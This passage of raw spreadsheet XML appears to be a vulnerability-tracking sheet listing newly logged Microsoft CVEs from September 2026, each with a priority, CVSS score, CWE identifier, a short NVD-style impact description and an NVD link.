r="M733" s="5" t="inlineStr" /><c r="N733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P733" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q733" s="5" t="inlineStr" /><c r="R733" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S733" s="5" t="inlineStr"><is><t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t></is></c></row><row r="734"><c r="A734" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C734" s="5" t="inlineStr"><is><t>CVE-2026-69428</t></is></c><c r="D734" s="5" t="n"><v>7.5</v></c><c r="E734" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G734" s="5" t="inlineStr" /><c r="H734" s="5" t="n"><v>0.011</v></c><c r="I734" s="5" t="inlineStr" /><c r="J734" s="5" t="inlineStr" /><c r="K734" s="5" t="inlineStr" /><c r="L734" s="5" t="inlineStr" /><c r="M734" s="5" t="inlineStr" /><c r="N734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q734" s="5" t="inlineStr" /><c r="R734" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S734" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t></is></c></row><row r="735"><c r="A735" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B735" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C735" s="5" t="inlineStr"><is><t>CVE-2026-69429</t></is></c><c r="D735" s="5" t="n"><v>7.5</v></c><c r="E735" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F735" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G735" s="5" t="inlineStr" /><c r="H735" s="5" t="n"><v>0.006</v></c><c r="I735" s="5" t="inlineStr" /><c r="J735" s="5" t="inlineStr" /><c r="K735" s="5" t="inlineStr" /><c r="L735" s="5" t="inlineStr" /><c r="M735" s="5" t="inlineStr" /><c r="N735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O735" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P735" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q735" s="5" t="inlineStr" /><c r="R735" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S735" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t></is></c><c r="T735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t></is></c></row><row r="736"><c r="A736" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C736" s="5" t="inlineStr"><is><t>CVE-2026-69443</t></is></c><c r="D736" s="5" t="n"><v>7.5</v></c><c r="E736" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F736" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G736" s="5" t="inlineStr" /><c r="H736" s="5" t="n"><v>0.01</v></c><c r="I736" s="5" t="inlineStr" /><c r="J736" s="5" t="inlineStr" /><c r="K736" s="5" t="inlineStr" /><c r="L736" s="5" t="inlineStr" /><c r="M736" s="5" t="inlineStr" /><c r="N736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q736" s="5" t="inlineStr" /><c r="R736" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S736" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t></is></c></row><row r="737"><c r="A737" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C737" s="5" t="inlineStr"><is><t>CVE-2026-69514</t></is></c><c r="D737" s="5" t="n"><v>7.5</v></c><c r="E737" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G737" s="5" t="inlineStr" /><c r="H737" s="5" t="n"><v>0.007</v></c><c r="I737" s="5" t="inlineStr" /><c r="J737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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7" s="5" t="inlineStr" /><c r="M737" s="5" t="inlineStr" /><c r="N737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P737" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q737" s="5" t="inlineStr" /><c r="R737" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S737" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t></is></c></row><row r="738"><c r="A738" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B738" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C738" s="5" t="inlineStr"><is><t>CVE-2026-69539</t></is></c><c r="D738" s="5" t="n"><v>7.5</v></c><c r="E738" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F738" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G738" s="5" t="inlineStr" /><c r="H738" s="5" t="n"><v>0.005</v></c><c r="I738" s="5" t="inlineStr" /><c r="J738" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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8" s="5" t="inlineStr" /><c r="M738" s="5" t="inlineStr" /><c r="N738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O738" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P738" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q738" s="5" t="inlineStr" /><c r="R738" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S738" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t></is></c></row><row r="739"><c r="A739" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B739" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C739" s="5" t="inlineStr"><is><t>CVE-2026-69587</t></is></c><c r="D739" s="5" t="n"><v>7.5</v></c><c r="E739" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F739" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G739" s="5" t="inlineStr" /><c r="H739" s="5" t="n"><v>0.012</v></c><c r="I739" s="5" t="inlineStr" /><c r="J739" s="5" t="inlineStr" /><c r="K739" s="5" t="inlineStr" /><c r="L739" s="5" t="inlineStr" /><c r="M739" s="5" t="inlineStr" /><c r="N739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q739" s="5" t="inlineStr" /><c r="R739" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S739" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t></is></c></row><row r="740"><c r="A740" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B740" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C740" s="5" t="inlineStr"><is><t>CVE-2026-69588</t></is></c><c r="D740" s="5" t="n"><v>7.5</v></c><c r="E740" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F740" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G740" s="5" t="inlineStr" /><c r="H740" s="5" t="n"><v>0.012</v></c><c r="I740" s="5" t="inlineStr" /><c r="J740" s="5" t="inlineStr" /><c r="K740" s="5" t="inlineStr" /><c r="L740" s="5" t="inlineStr" /><c r="M740" s="5" t="inlineStr" /><c r="N740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q740" s="5" t="inlineStr" /><c r="R740" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S740" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t></is></c></row><row r="741"><c r="A741" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B741" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C741" s="5" t="inlineStr"><is><t>CVE-2026-69599</t></is></c><c r="D741" s="5" t="n"><v>7.5</v></c><c r="E741" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F741" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G741" s="5" t="inlineStr" /><c r="H741" s="5" t="n"><v>0.007</v></c><c r="I741" s="5" t="inlineStr" /><c r="J741" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K741" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L741" s="5" t="inlineStr" /><c r="M741" s="5" t="inlineStr" /><c r="N741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O741" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P741" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q741" s="5" t="inlineStr" /><c r="R741" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S741" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t></is></c></row><row r="742"><c r="A742" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B742" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C742" s="5" t="inlineStr"><is><t>CVE-2026-69607</t></is></c><c r="D742" s="5" t="n"><v>7.5</v></c><c r="E742" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F742" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G742" s="5" t="inlineStr" /><c r="H742" s="5" t="n"><v>0.006</v></c><c r="I742" s="5" t="inlineStr" /><c r="J742" s="5" t="inlineStr" /><c r="K742" s="5" t="inlineStr" /><c r="L742" s="5" t="inlineStr" /><c r="M742" s="5" t="inlineStr" /><c r="N742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O742" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P742" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q742" s="5" t="inlineStr" /><c r="R742" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S742" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t></is></c></row><row r="743"><c r="A743" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B743" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C743" s="5" t="inlineStr"><is><t>CVE-2026-69631</t></is></c><c r="D743" s="5" t="n"><v>7.5</v></c><c r="E743" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F743" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G743" s="5" t="inlineStr" /><c r="H743" s="5" t="n"><v>0.012</v></c><c r="I743" s="5" t="inlineStr" /><c r="J743" s="5" t="inlineStr" /><c r="K743" s="5" t="inlineStr" /><c r="L743" s="5" t="inlineStr" /><c r="M743" s="5" t="inlineStr" /><c r="N743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q743" s="5" t="inlineStr" /><c r="R743" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S743" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t></is></c></row><row r="744"><c r="A744" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B744" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C744" s="5" t="inlineStr"><is><t>CVE-2026-69710</t></is></c><c r="D744" s="5" t="n"><v>7.5</v></c><c r="E744" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F744" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G744" s="5" t="inlineStr" /><c r="H744" s="5" t="n"><v>0.002</v></c><c r="I744" s="5" t="inlineStr" /><c r="J744" s="5" t="inlineStr" /><c r="K744" s="5" t="inlineStr" /><c r="L744" s="5" t="inlineStr" /><c r="M744" s="5" t="inlineStr" /><c r="N744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O744" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P744" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q744" s="5" t="inlineStr" /><c r="R744" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S744" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t></is></c></row><row r="745"><c r="A745" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B745" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C745" s="5" t="inlineStr"><is><t>CVE-2026-69739</t></is></c><c r="D745" s="5" t="n"><v>7.5</v></c><c r="E745" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G745" s="5" t="inlineStr" /><c r="H745" s="5" t="n"><v>0.008999999999999999</v></c><c r="I745" s="5" t="inlineStr" /><c r="J745" s="5" t="inlineStr" /><c r="K745" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L745" s="5" t="inlineStr" /><c r="M745" s="5" t="inlineStr" /><c r="N745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O745" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P745" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q745" s="5" t="inlineStr" /><c r="R745" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S745" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t></is></c></row><row r="746"><c r="A746" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B746" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C746" s="5" t="inlineStr"><is><t>CVE-2026-69744</t></is></c><c r="D746" s="5" t="n"><v>7.5</v></c><c r="E746" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F746" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G746" s="5" t="inlineStr" /><c r="H746" s="5" t="n"><v>0.011</v></c><c r="I746" s="5" t="inlineStr" /><c r="J746" s="5" t="inlineStr" /><c r="K746" s="5" t="inlineStr" /><c r="L746" s="5" t="inlineStr" /><c r="M746" s="5" t="inlineStr" /><c r="N746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q746" s="5" t="inlineStr" /><c r="R746" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S746" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t></is></c></row><row r="747"><c r="A747" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B747" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C747" s="5" t="inlineStr"><is><t>CVE-2026-69760</t></is></c><c r="D747" s="5" t="n"><v>7.5</v></c><c r="E747" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F747" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G747" s="5" t="inlineStr" /><c r="H747" s="5" t="n"><v>0.011</v></c><c r="I747" s="5" t="inlineStr" /><c r="J747" s="5" t="inlineStr" /><c r="K747" s="5" t="inlineStr" /><c r="L747" s="5" t="inlineStr" /><c r="M747" s="5" t="inlineStr" /><c r="N747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q747" s="5" t="inlineStr" /><c r="R747" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S747" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t></is></c></row><row r="748"><c r="A748" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B748" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C748" s="5" t="inlineStr"><is><t>CVE-2026-69793</t></is></c><c r="D748" s="5" t="n"><v>7.5</v></c><c r="E748" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F748" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G748" s="5" t="inlineStr" /><c r="H748" s="5" t="n"><v>0.008</v></c><c r="I748" s="5" t="inlineStr" /><c r="J748" s="5" t="inlineStr" /><c r="K748" s="5" t="inlineStr" /><c r="L748" s="5" t="inlineStr" /><c r="M748" s="5" t="inlineStr" /><c r="N748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O748" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P748" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q748" s="5" t="inlineStr" /><c r="R748" s="5" t="inlineStr"><is><t>CWE-1288</t></is></c><c r="S748" s="5" t="inlineStr"><is><t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t></is></c></row><row r="749"><c r="A749" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B749" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C749" s="5" t="inlineStr"><is><t>CVE-2026-69803</t></is></c><c r="D749" s="5" t="n"><v>7.5</v></c><c r="E749" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G749" s="5" t="inlineStr" /><c r="H749" s="5" t="n"><v>0.008</v></c><c r="I749" s="5" t="inlineStr" /><c r="J749" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K749" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L749" s="5" t="inlineStr" /><c r="M749" s="5" t="inlineStr" /><c r="N749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O749" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P749" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q749" s="5" t="inlineStr" /><c r="R749" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S749" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t></is></c></row><row r="750"><c r="A750" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C750" s="5" t="inlineStr"><is><t>CVE-2026-69804</t></is></c><c r="D750" s="5" t="n"><v>7.5</v></c><c r="E750" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F750" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G750" s="5" t="inlineStr" /><c r="H750" s="5" t="n"><v>0.005</v></c><c r="I750" s="5" t="inlineStr" /><c r="J750" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K750" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L750" s="5" t="inlineStr" /><c r="M750" s="5" t="inlineStr" /><c r="N750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P750" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q750" s="5" t="inlineStr" /><c r="R750" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S750" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t></is></c></row><row r="751"><c r="A751" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C751" s="5" t="inlineStr"><is><t>CVE-2026-69805</t></is></c><c r="D751" s="5" t="n"><v>7.5</v></c><c r="E751" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F751" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G751" s="5" t="inlineStr" /><c r="H751" s="5" t="n"><v>0.005</v></c><c r="I751" s="5" t="inlineStr" /><c r="J751" s="5" t="inlineStr" /><c r="K751" s="5" t="inlineStr" /><c r="L751" s="5" t="inlineStr" /><c r="M751" s="5" t="inlineStr" /><c r="N751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P751" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q751" s="5" t="inlineStr" /><c r="R751" s="5" t="inlineStr"><is><t>CWE-200, CWE-522, CWE-73</t></is></c><c r="S751" s="5" t="inlineStr"><is><t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t></is></c></row><row r="752"><c r="A752" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C752" s="5" t="inlineStr"><is><t>CVE-2026-69809</t></is></c><c r="D752" s="5" t="n"><v>7.5</v></c><c r="E752" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F752" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G752" s="5" t="inlineStr" /><c r="H752" s="5" t="n"><v>0.011</v></c><c r="I752" s="5" t="inlineStr" /><c r="J752" s="5" t="inlineStr" /><c r="K752" s="5" t="inlineStr" /><c r="L752" s="5" t="inlineStr" /><c r="M752" s="5" t="inlineStr" /><c r="N752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q752" s="5" t="inlineStr" /><c r="R752" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S752" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t></is></c></row><row r="753"><c r="A753" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C753" s="5" t="inlineStr"><is><t>CVE-2026-69852</t></is></c><c r="D753" s="5" t="n"><v>7.5</v></c><c r="E753" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F753" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G753" s="5" t="inlineStr" /><c r="H753" s="5" t="n"><v>0.006</v></c><c r="I753" s="5" t="inlineStr" /><c r="J753" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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53" s="5" t="inlineStr" /><c r="M753" s="5" t="inlineStr" /><c r="N753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P753" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q753" s="5" t="inlineStr" /><c r="R753" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S753" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t></is></c></row><row r="754"><c r="A754" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B754" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C754" s="5" t="inlineStr"><is><t>CVE-2026-69881</t></is></c><c r="D754" s="5" t="n"><v>7.5</v></c><c r="E754" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F754" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G754" s="5" t="inlineStr" /><c r="H754" s="5" t="n"><v>0.012</v></c><c r="I754" s="5" t="inlineStr" /><c r="J754" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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54" s="5" t="inlineStr" /><c r="M754" s="5" t="inlineStr" /><c r="N754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O754" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P754" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q754" s="5" t="inlineStr" /><c r="R754" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S754" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t></is></c></row><row r="755"><c r="A755" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B755" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C755" s="5" t="inlineStr"><is><t>CVE-2026-69890</t></is></c><c r="D755" s="5" t="n"><v>7.5</v></c><c r="E755" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F755" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G755" s="5" t="inlineStr" /><c r="H755" s="5" t="n"><v>0.003</v></c><c r="I755" s="5" t="inlineStr" /><c r="J755" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K755"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55" s="5" t="inlineStr" /><c r="M755" s="5" t="inlineStr" /><c r="N755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O755" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P755" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q755" s="5" t="inlineStr" /><c r="R755" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S755" s="5" t="inlineStr"><is><t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t></is></c></row><row r="756"><c r="A756" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B756" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C756" s="5" t="inlineStr"><is><t>CVE-2026-69929</t></is></c><c r="D756" s="5" t="n"><v>7.5</v></c><c r="E756" s="5" 